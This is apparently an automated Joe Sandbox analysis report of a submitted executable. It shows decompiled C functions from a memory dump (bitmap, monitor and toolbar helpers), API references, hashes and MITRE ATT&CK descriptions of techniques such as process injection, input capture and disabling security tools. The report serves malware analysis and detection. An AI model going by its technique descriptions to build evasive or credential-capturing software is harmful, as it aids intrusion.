0x00cd45a9
0x00cd45b0
0x00000000
0x00cd45bf
0x00000000
0x00cd45b8
0x00cd4522
0x00000000
0x00cd4524
0x00cd4529
0x00cd452d
0x00000000
0x00cd4545
0x00cd4565
0x00cd4573
0x00cd457b
0x00cd457d
0x00cd4584
0x00cd4584
0x00cd452d
0x00cd4522
0x00cd459d

APIs

Part of subcall function 00CD42E2: IsWindow.USER32(?), ref: 00CD42F0

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00CD453B
SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00CD4551

Part of subcall function 00CD75E3: IsWindow.USER32(?), ref: 00CD75EF
Part of subcall function 00CD75E3: SendMessageA.USER32(?,0000110C,00000000,?), ref: 00CD7618

Strings

N, xrefs: 00CD44FC

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: MessageSend$Window
String ID: N
API String ID: 2326795674-1130791706
Opcode ID: f7b147ea9abdd21a45f6c18e60bf70207c4f82c894c261a9e16b5b7898d0fa4e
Instruction ID: aed61840b75e9ddac4c9e4931c9a04dac4233624734fe4a7139d896542cc3d9a
Opcode Fuzzy Hash: f7b147ea9abdd21a45f6c18e60bf70207c4f82c894c261a9e16b5b7898d0fa4e
Instruction Fuzzy Hash: FC210A31200704ABCF255F51EC45FEA77A9FF84721F04412AFB999A391EF719A50DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CD89BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00CD89BC(struct HDC__* _a4) {
				signed int _v8;
				void _v40;
				unsigned int _v98;
				char _v99;
				char _v100;
				unsigned int _v102;
				char _v103;
				char _v104;
				struct tagBITMAPINFOHEADER _v144;
				void* __ebx;
				void* __esi;
				signed int _t24;
				unsigned int _t34;
				intOrPtr _t46;
				unsigned int _t47;
				signed int _t52;
				void* _t55;
				void* _t56;
				struct HDC__* _t57;
				signed int _t58;

				_t24 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t24 ^ _t58;
				_t57 = _a4;
				E00DDFBE0(_t56,  &_v144, 0, 0x68);
				_t47 =  *0xe870fc; // 0xf0f0f0
				_v144.biCompression = _v144.biCompression & 0x00000000;
				_v144.biPlanes = 1;
				_v144.biBitCount = 1;
				_v104 = _t47 >> 0x10;
				_t46 = 8;
				_v144.biSize = 0x28;
				_v144.biWidth = _t46;
				_v144.biHeight = _t46;
				_v103 = _t47 >> 8;
				_v102 = _t47;
				_t34 = GetSysColor(0x14);
				_v98 = _t34;
				_v100 = _t34 >> 0x10;
				_v99 = _t34 >> 8;
				_t52 = 0;
				do {
					asm("sbb eax, eax");
					 *((intOrPtr*)(_t58 + _t52 * 4 - 0x24)) = ( ~(_t52 & 1) & 0x5554aaab) + 0x5555aaaa;
					_t52 = _t52 + 1;
				} while (_t52 < _t46);
				return E00DDCBCE(CreateDIBitmap(_t57,  &_v144, 4,  &_v40,  &_v144, 0), _t46, _v8 ^ _t58, _t55, _t56, _t57);
			}

0x00cd89c5
0x00cd89cc
0x00cd89d1
0x00cd89df
0x00cd89e4
0x00cd89ec
0x00cd89f1
0x00cd89f8
0x00cd8a01
0x00cd8a08
0x00cd8a0e
0x00cd8a18
0x00cd8a1e
0x00cd8a24
0x00cd8a27
0x00cd8a2a
0x00cd8a32
0x00cd8a38
0x00cd8a40
0x00cd8a43
0x00cd8a45
0x00cd8a4e
0x00cd8a5a
0x00cd8a5e
0x00cd8a5f
0x00cd8a8d

APIs

GetSysColor.USER32(00000014), ref: 00CD8A2A
CreateDIBitmap.GDI32(?,00000028,00000004,?,00000028,00000000), ref: 00CD8A7A

Strings

(, xrefs: 00CD8A0E

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: BitmapColorCreate
String ID: (
API String ID: 2048008349-3887548279
Opcode ID: 4fd62a22dbb93bd543c4d4df2ff6bdac13c6792001a51bc18719e3818b575a39
Instruction ID: c6af4b185807c25b1d584d034dffff8fbaed5eb78f780ba3c2b6f0c1d2572f0e
Opcode Fuzzy Hash: 4fd62a22dbb93bd543c4d4df2ff6bdac13c6792001a51bc18719e3818b575a39
Instruction Fuzzy Hash: 11218031A51258DFEB14DFA8DD46BEDB7F4EB14300F4080AEE545EB281DA349A08CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00CD240C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00CD240C(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8, intOrPtr _a16, intOrPtr* _a24) {
				signed int _v4;
				char _v16;
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t23;
				intOrPtr _t28;
				void* _t31;
				void* _t34;
				void* _t37;
				intOrPtr* _t40;

				_t38 = __edi;
				_t31 = __ecx;
				_t30 = __ebx;
				_push(4);
				E00DDD52C(0xe08583, __ebx, __edi, __esi);
				_t17 = _a16;
				_t37 = 3;
				if(_a8 == _t37 || _t17 == 0) {
					_t40 = _a24;
					if(_t40 != 0) {
						__eflags = _a8 - _t37;
						if(_a8 != _t37) {
							L7:
							_t18 =  *((intOrPtr*)(_t31 + 0x404));
							__eflags = _t18;
							if(__eflags == 0) {
								goto L10;
							} else {
								_push( *((intOrPtr*)(_t18 + 0x88)));
								E00CA2ABC(_t30,  &_v16, _t38, _t40, __eflags);
								_v4 = _v4 & 0x00000000;
								_t23 = E00CAEEBF(_v16,  *((intOrPtr*)(_v16 - 0xc)));
								_pop(_t34);
								__eflags = _t23;
								if(_t23 == 0) {
									E00CA2DEB(_t34);
									asm("int3");
									asm("sbb eax, eax");
									_t28 = ( ~_v4 & 0xfffaffac) + 0x80070057;
									__eflags = _t28;
									return _t28;
								} else {
									 *_t40 = _t23;
									E00CA2975(_t23, _v16 - 0x10);
									goto L10;
								}
							}
						} else {
							__eflags = _t17;
							if(_t17 != 0) {
								goto L7;
							} else {
								__imp__#2(L"PropertyList");
								 *_t40 = _t17;
								L10:
								_t19 = 0;
								__eflags = 0;
								goto L11;
							}
						}
					} else {
						goto L3;
					}
				} else {
					L3:
					_t19 = 0x80070057;
					L11:
					return E00DDD4FA(_t19);
				}
			}

0x00cd240c
0x00cd240c
0x00cd240c
0x00cd240c
0x00cd2413
0x00cd2418
0x00cd241d
0x00cd2422
0x00cd2428
0x00cd242d
0x00cd2436
0x00cd243a
0x00cd244f
0x00cd244f
0x00cd2455
0x00cd2457
0x00000000
0x00cd2459
0x00cd2459
0x00cd2462
0x00cd246a
0x00cd2472
0x00cd2478
0x00cd2479
0x00cd247b
0x00cd2494
0x00cd2499
0x00cd24a2
0x00cd24a9
0x00cd24a9
0x00cd24af
0x00cd247d
0x00cd2480
0x00cd2485
0x00000000
0x00cd2485
0x00cd247b
0x00cd243c
0x00cd243c
0x00cd243e
0x00000000
0x00cd2440
0x00cd2445
0x00cd244b
0x00cd248a
0x00cd248a
0x00cd248a
0x00000000
0x00cd248a
0x00cd243e
0x00000000
0x00000000
0x00000000
0x00cd242f
0x00cd242f
0x00cd242f
0x00cd248c
0x00cd2491
0x00cd2491

APIs

__EH_prolog3.LIBCMT ref: 00CD2413
SysAllocString.OLEAUT32(PropertyList), ref: 00CD2445

Part of subcall function 00CA2ABC: __EH_prolog3.LIBCMT ref: 00CA2AC3

Part of subcall function 00CAEEBF: MultiByteToWideChar.KERNEL32(00000003,00000000,?,?,00000000,00000000,?,?,?,?,00CAEEB4,?,?), ref: 00CAEED2
Part of subcall function 00CAEEBF: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00CAEEDC
Part of subcall function 00CAEEBF: MultiByteToWideChar.KERNEL32(00000003,00000000,?,?,00000000,00000000,?,?,?,?,00CAEEB4,?,?), ref: 00CAEEF3

Strings

PropertyList, xrefs: 00CD2440

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: AllocByteCharH_prolog3MultiStringWide
String ID: PropertyList
API String ID: 1764084418-1939653111
Opcode ID: 5b056472dfef757997f062c573a65e6881e0fa1849b726833342242bc12e76ac
Instruction ID: ad196f5dcebd105a89ff153c32d7c6b87d9ba012d7ec5324086416663fd29cf3
Opcode Fuzzy Hash: 5b056472dfef757997f062c573a65e6881e0fa1849b726833342242bc12e76ac
Instruction Fuzzy Hash: 18119E716102179BCF20AF74DC06AAA73A4AF20714F14842AFE25DB291EA71DA419BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00CD8E5F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00CD8E5F(struct HMONITOR__* _a4, long* _a16) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagMONITORINFO _v64;
				void* __esi;
				signed int _t23;
				long _t33;
				long _t34;
				long _t35;
				long _t36;
				void* _t37;
				void* _t41;
				void* _t42;
				long* _t43;
				signed int _t44;

				_t23 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t23 ^ _t44;
				_t43 = _a16;
				_v64.cbSize = 0x28;
				if(GetMonitorInfoA(_a4,  &_v64) != 0) {
					CopyRect( &_v24,  &(_v64.rcWork));
					_t33 =  *_t43;
					if(_t33 >= _v24.left) {
						_t33 = _v24.left;
					}
					 *_t43 = _t33;
					_t34 = _t43[2];
					if(_t34 <= _v24.right) {
						_t34 = _v24.right;
					}
					_t43[2] = _t34;
					_t35 = _t43[1];
					if(_t35 >= _v24.top) {
						_t35 = _v24.top;
					}
					_t43[1] = _t35;
					_t36 = _t43[3];
					if(_t36 <= _v24.bottom) {
						_t36 = _v24.bottom;
					}
					_t43[3] = _t36;
				}
				return E00DDCBCE(1, _t37, _v8 ^ _t44, _t41, _t42, _t43);
			}

0x00cd8e65
0x00cd8e6c
0x00cd8e76
0x00cd8e7b
0x00cd8e8a
0x00cd8e94
0x00cd8e9a
0x00cd8e9f
0x00cd8ea1
0x00cd8ea1
0x00cd8ea4
0x00cd8ea6
0x00cd8eac
0x00cd8eae
0x00cd8eae
0x00cd8eb1
0x00cd8eb4
0x00cd8eba
0x00cd8ebc
0x00cd8ebc
0x00cd8ebf
0x00cd8ec2
0x00cd8ec8
0x00cd8eca
0x00cd8eca
0x00cd8ecd
0x00cd8ecd
0x00cd8edf

APIs

GetMonitorInfoA.USER32 ref: 00CD8E82
CopyRect.USER32 ref: 00CD8E94

Strings

(, xrefs: 00CD8E7B

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CopyInfoMonitorRect
String ID: (
API String ID: 2119610155-3887548279
Opcode ID: 8865156d4ba545b07f525de238a29ad120ce5b04e90e107cab503aa9849575bd
Instruction ID: 0dc4f8dadf762033ac49390824fc93ad2806f1d964b73b1e1b73403f8837efd7
Opcode Fuzzy Hash: 8865156d4ba545b07f525de238a29ad120ce5b04e90e107cab503aa9849575bd
Instruction Fuzzy Hash: 4C11C275A00609AFCB50DFA9C98199EB7F9EB08700B50885AE5A5E3750DB30FA48CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00D7B2E9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00D7B2E9(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v0;
				signed int _v4;
				signed int _v8;
				char _v12;
				CHAR* _v16;
				signed int _t14;
				intOrPtr _t16;
				void* _t18;
				signed int _t20;
				signed int _t23;
				signed int _t24;
				void* _t31;
				CHAR* _t36;
				void* _t40;

				_t34 = __edi;
				_t29 = __ebx;
				_push(4);
				E00DDD52C(0xe08583, __ebx, __edi, __esi);
				_t14 =  *0xe887d4; // 0x0
				if(_t14 != 0) {
					L5:
					return E00DDD4FA(_t14);
				} else {
					_t16 =  *0xe887d8; // 0xe681e4
					_push(_t16 + 0xfffffff0);
					_t18 = E00CA68F8(__ebx, __edi, __esi);
					_pop(_t31);
					_t1 = _t18 + 0x10; // 0x10
					_t36 = _t1;
					_v16 = _t36;
					_v4 = _v4 & 0x00000000;
					_t44 =  *((intOrPtr*)(_t36 - 0xc));
					if( *((intOrPtr*)(_t36 - 0xc)) == 0) {
						E00CA6953( &_v16, "ToolbarButton%p", E00CAC659(_t31, _t36, _t44));
						_t36 = _v16;
						_t40 = _t40 + 0xc;
					}
					_t20 = RegisterWindowMessageA(_t36) & 0x0000ffff;
					 *0xe887d4 = _t20;
					if(_t20 == 0) {
						E00CAA4E7(_t29, _t31, _t34, _t36, __eflags);
						asm("int3");
						_push(_t31);
						_t23 = E00CD5DC4(0xe683b4, __eflags, _v0,  &_v12);
						__eflags = _t23;
						if(_t23 == 0) {
							_t24 = _t23 | 0xffffffff;
							__eflags = _t24;
						} else {
							_t24 = _v8;
						}
						return _t24;
					} else {
						_t8 = _t36 - 0x10; // 0x0
						E00CA2975(_t20, _t8);
						_t14 =  *0xe887d4; // 0x0
						goto L5;
					}
				}
			}

0x00d7b2e9
0x00d7b2e9
0x00d7b2e9
0x00d7b2f0
0x00d7b2f5
0x00d7b2fe
0x00d7b35c
0x00d7b361
0x00d7b300
0x00d7b300
0x00d7b308
0x00d7b309
0x00d7b30e
0x00d7b30f
0x00d7b30f
0x00d7b312
0x00d7b315
0x00d7b319
0x00d7b31d
0x00d7b32e
0x00d7b333
0x00d7b336
0x00d7b336
0x00d7b340
0x00d7b343
0x00d7b34c
0x00d7b362
0x00d7b367
0x00d7b36b
0x00d7b378
0x00d7b37d
0x00d7b37f
0x00d7b386
0x00d7b386
0x00d7b381
0x00d7b381
0x00d7b381
0x00d7b38a
0x00d7b34e
0x00d7b34e
0x00d7b351
0x00d7b356
0x00000000
0x00d7b356
0x00d7b34c

APIs

__EH_prolog3.LIBCMT ref: 00D7B2F0
RegisterWindowMessageA.USER32(00000010,00000004,00D7B094,00000000,00000000,0000005C,00CEFC5B,?,00000550), ref: 00D7B33A

Strings

ToolbarButton%p, xrefs: 00D7B328

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3MessageRegisterWindow
String ID: ToolbarButton%p
API String ID: 875023513-899657487
Opcode ID: d8ba29dc931c45bab9b9b03ed97ddf08b2eb575a6f4efd049b01aa90c1c02856
Instruction ID: 435cf10257db16bd22857a2cdee477a94ad3b458e226ee822942fe6b9f0b4f75
Opcode Fuzzy Hash: d8ba29dc931c45bab9b9b03ed97ddf08b2eb575a6f4efd049b01aa90c1c02856
Instruction Fuzzy Hash: 3BF0F4744002128ECF10BBA4DD067AE7334EF00318F885807F8A8B32A2EF345549CB74

Uniqueness

Uniqueness Score: -1.00%

Function 00CA70ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetupDiGetClassDevsA.SETUPAPI(00000000,00000000,00000000,00000006), ref: 00CA70F5
SetupDiDestroyDeviceInfoList.SETUPAPI(00000000), ref: 00CA7111

Strings

C:\DownLoad-Helper, xrefs: 00CA70ED

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Setup$ClassDestroyDeviceDevsInfoList
String ID: C:\DownLoad-Helper
API String ID: 4162545228-3014362428
Opcode ID: c019f25cea50deb3ec7b025f800d3265814cd0bb6dca556e637c1078af98592c
Instruction ID: 6c3ac8d42245edc839470379f8a04e77a2015e9dc7eeb180b764abc196910133
Opcode Fuzzy Hash: c019f25cea50deb3ec7b025f800d3265814cd0bb6dca556e637c1078af98592c
Instruction Fuzzy Hash: 12D0A77554D0305FDA013B353C0C9FF296DDB09731B014620FC62E21D0EA340C8541E0

Uniqueness

Uniqueness Score: -1.00%

Function 00CA711B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetupDiGetClassDevsA.SETUPAPI(00000000,00000000,00000000,00000006), ref: 00CA7123
SetupDiDestroyDeviceInfoList.SETUPAPI(00000000), ref: 00CA713F

Strings

C:\DownLoad-Helper, xrefs: 00CA711B

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Setup$ClassDestroyDeviceDevsInfoList
String ID: C:\DownLoad-Helper
API String ID: 4162545228-3014362428
Opcode ID: 5fc63567f43c4c1d1cd799ffc1b4c6bd9b865e7078dd0a733f080d2cddd148e4
Instruction ID: cd82ea78322e29118163a4b2cc721917187d7f03f647b04bc3d08449c2a48930
Opcode Fuzzy Hash: 5fc63567f43c4c1d1cd799ffc1b4c6bd9b865e7078dd0a733f080d2cddd148e4
Instruction Fuzzy Hash: 30D0A77564D0309FD6003B35BC0C8FF6AADEB09735B018620FC72E61D0D6340C8441E0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

